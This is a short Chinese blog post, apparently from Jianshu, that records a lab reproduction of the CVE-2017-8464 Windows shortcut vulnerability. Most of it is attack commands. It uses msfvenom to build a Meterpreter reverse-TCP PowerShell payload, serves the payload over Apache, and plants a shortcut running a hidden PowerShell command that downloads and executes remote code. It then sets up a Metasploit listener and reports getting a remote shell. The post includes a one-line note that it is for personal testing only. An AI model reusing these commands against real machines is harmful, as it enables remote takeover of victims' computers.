CVE-2017-8464漏洞復(fù)現(xiàn)

該漏洞以存在一段時間,由于能力問題一直未對該漏洞利用方式進(jìn)行測試,今天學(xué)過程中記錄一下測試流程。

  1. 確認(rèn)系統(tǒng)是否存在該漏洞
  2. 使用msfvenom 生成反彈shell,shell生成方式如下:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.203.1 LPORT=5555 -f psh-reflection >test.ps1


生成反彈shell
確認(rèn)生成文件
  1. 將生成文件放到apache網(wǎng)站根目錄

sudo cp test.ps1 /var/www/html/


復(fù)制完成
  1. 啟用apache服務(wù)

sudo service apache2 start
啟動服務(wù)后通過curl方式測試是否正常訪問

服務(wù)啟動
  1. 在靶機(jī)上啟用powershell鏈接

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://.../sonar.ps1');xx.ps1" 保存為exe文件。

新建快捷方式
保存
  1. 在攻擊端監(jiān)聽反彈
    metasploit做以下相關(guān)配置:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST ...
msf exploit(handler) > set LPORT ****
msf exploit(handler) > run

啟動監(jiān)聽
  1. 在被攻擊端運行創(chuàng)建快捷鍵
  2. msf獲取到遠(yuǎn)程shell
反彈成功
執(zhí)行系統(tǒng)命令

僅作自己測試,請勿違規(guī)使用。

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

推薦閱讀更多精彩內(nèi)容